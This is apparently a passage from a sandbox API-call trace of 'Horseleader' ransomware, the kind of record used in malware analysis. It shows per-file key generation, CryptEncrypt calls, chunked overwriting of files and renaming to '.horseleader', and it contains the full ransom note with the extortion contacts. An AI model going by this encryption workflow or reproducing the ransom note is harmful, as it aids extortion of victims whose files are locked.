[0244.659] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0244.659] CloseHandle (hObject=0x1a4) returned 1 [0244.659] GetProcessHeap () returned 0x780000 [0244.659] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.659] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSetupPS.dll.horseleader") returned 108 [0244.660] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSetupPS.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\osetupps.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSetupPS.dll.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\osetupps.dll.horseleader")) returned 1 [0244.661] GetProcessHeap () returned 0x780000 [0244.661] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0244.661] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14af010, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x2095e10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2095e10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="Outlook.en-us", cAlternateFileName="OUTLOO~1.EN-")) returned 1 [0244.661] lstrcmpiW (lpString1="Outlook.en-us", lpString2="Windows") returned -1 [0244.661] wnsprintfW (in: pszDest=0x7db828, 
cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us") returned 97 [0244.661] lstrcmpW (lpString1="Outlook.en-us", lpString2=".") returned 1 [0244.661] lstrcmpW (lpString1="Outlook.en-us", lpString2="..") returned 1 [0244.661] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0244.661] GetProcessHeap () returned 0x780000 [0244.661] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.661] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\*") returned 99 [0244.661] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14af010, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x2095e10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2095e10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x989bbea3, dwReserved1=0xaacf483b, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0244.662] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.662] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\.") returned 99 [0244.662] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.663] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, 
ftCreationTime.dwLowDateTime=0x14af010, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x2095e10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2095e10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x989bbea3, dwReserved1=0xaacf483b, cFileName="..", cAlternateFileName="")) returned 1 [0244.664] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.664] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\..") returned 100 [0244.664] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.664] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.664] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee827f20, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x14af010, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xee827f20, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xc72, dwReserved0=0x989bbea3, dwReserved1=0xaacf483b, cFileName="OutlookMUI.XML", cAlternateFileName="OUTLOO~1.XML")) returned 1 [0244.665] lstrcmpiW (lpString1="OutlookMUI.XML", lpString2="Windows") returned -1 [0244.665] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 112 [0244.665] StrStrIW (lpFirst="OutlookMUI.XML", lpSrch=".horseleader") returned 0x0 [0244.665] lstrcmpW (lpString1="OutlookMUI.XML", lpString2="#Decrypt#.txt") returned 1 [0244.665] lstrcmpW (lpString1="OutlookMUI.XML", lpString2="_uninstalling_.png") returned 1 [0244.665] lstrlenW (lpString=".testttjffg") returned 11 [0244.665] StrStrW 
(lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML", lpSrch=".testttjffg") returned 0x0 [0244.665] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.665] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.665] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.666] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 112 [0244.666] StrStrW (lpFirst="OutlookMUI.XML", lpSrch=".txt") returned 0x0 [0244.666] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=3186) returned 1 [0244.666] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0xc72, lpOverlapped=0x0) returned 1 [0244.668] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffff38e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.669] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0xc72, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0xc72, lpOverlapped=0x0) returned 1 [0244.669] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, 
lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.669] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.669] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.669] CloseHandle (hObject=0x15c) returned 1 [0244.669] GetProcessHeap () returned 0x780000 [0244.669] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.670] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML.horseleader") returned 124 [0244.671] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml.horseleader")) returned 1 [0244.672] GetProcessHeap () returned 0x780000 [0244.672] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.672] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf00db300, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x2095e10, 
ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x106f, dwReserved0=0x989bbea3, dwReserved1=0xaacf483b, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0244.672] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0244.672] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 107 [0244.672] StrStrIW (lpFirst="SETUP.XML", lpSrch=".horseleader") returned 0x0 [0244.672] lstrcmpW (lpString1="SETUP.XML", lpString2="#Decrypt#.txt") returned 1 [0244.672] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0244.672] lstrlenW (lpString=".testttjffg") returned 11 [0244.672] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML", lpSrch=".testttjffg") returned 0x0 [0244.672] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.673] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.673] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.674] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 107 [0244.674] 
StrStrW (lpFirst="SETUP.XML", lpSrch=".txt") returned 0x0 [0244.674] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=4207) returned 1 [0244.675] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x106f, lpOverlapped=0x0) returned 1 [0244.677] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffef91, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.677] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x106f, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x106f, lpOverlapped=0x0) returned 1 [0244.678] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.678] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.678] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.678] CloseHandle (hObject=0x15c) returned 1 [0244.678] GetProcessHeap () returned 0x780000 [0244.678] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.678] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML.horseleader") returned 119 [0244.678] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup 
Controller\\Outlook.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml.horseleader")) returned 1 [0244.680] GetProcessHeap () returned 0x780000 [0244.680] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.680] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf00db300, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x2095e10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x106f, dwReserved0=0x989bbea3, dwReserved1=0xaacf483b, cFileName="SETUP.XML", cAlternateFileName="")) returned 0 [0244.680] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0244.680] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\#Decrypt#.txt") returned 111 [0244.680] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.683] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ 
@Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0244.683] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0244.684] lstrlenA (lpString="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") returned 1368 [0244.684] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0244.685] CloseHandle (hObject=0x1a4) returned 1 [0244.685] GetProcessHeap () returned 0x780000 [0244.685] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0244.685] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb169e000, ftCreationTime.dwHighDateTime=0x1ca911f, ftLastAccessTime.dwLowDateTime=0x6cee1d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb169e000, ftLastWriteTime.dwHighDateTime=0x1ca911f, nFileSizeHigh=0x0, nFileSizeLow=0x165510, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="pidgenx.dll", cAlternateFileName="")) returned 1 [0244.685] lstrcmpiW (lpString1="pidgenx.dll", lpString2="Windows") returned -1 [0244.685] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pidgenx.dll") returned 95 [0244.685] StrStrIW (lpFirst="pidgenx.dll", lpSrch=".horseleader") returned 0x0 [0244.685] lstrcmpW (lpString1="pidgenx.dll", lpString2="#Decrypt#.txt") returned 1 [0244.685] lstrcmpW (lpString1="pidgenx.dll", lpString2="_uninstalling_.png") returned 1 [0244.685] lstrlenW (lpString=".testttjffg") returned 11 [0244.685] StrStrW (lpFirst="\\\\?\\C:\\Program 
Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pidgenx.dll", lpSrch=".testttjffg") returned 0x0 [0244.685] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0244.685] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0244.686] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pidgenx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\pidgenx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.687] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pidgenx.dll") returned 95 [0244.687] StrStrW (lpFirst="pidgenx.dll", lpSrch=".txt") returned 0x0 [0244.687] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1463568) returned 1 [0244.687] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.687] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.690] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.690] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.690] 
SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xb0288, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.691] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.696] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.696] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.697] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x160510, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.697] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.699] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.700] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.700] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.700] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0244.700] WriteFile (in: hFile=0x1a4, 
lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0244.700] CloseHandle (hObject=0x1a4) returned 1 [0244.701] GetProcessHeap () returned 0x780000 [0244.701] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.701] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pidgenx.dll.horseleader") returned 107 [0244.701] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pidgenx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\pidgenx.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pidgenx.dll.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\pidgenx.dll.horseleader")) returned 1 [0244.702] GetProcessHeap () returned 0x780000 [0244.702] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0244.702] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17eefe00, ftCreationTime.dwHighDateTime=0x1ca9120, ftLastAccessTime.dwLowDateTime=0xbe99ad60, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x17eefe00, ftLastWriteTime.dwHighDateTime=0x1ca9120, nFileSizeHigh=0x0, nFileSizeLow=0xaec3a, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="pkeyconfig-office.xrm-ms", cAlternateFileName="PKEYCO~1.XRM")) returned 1 [0244.702] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="Windows") returned -1 [0244.702] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, 
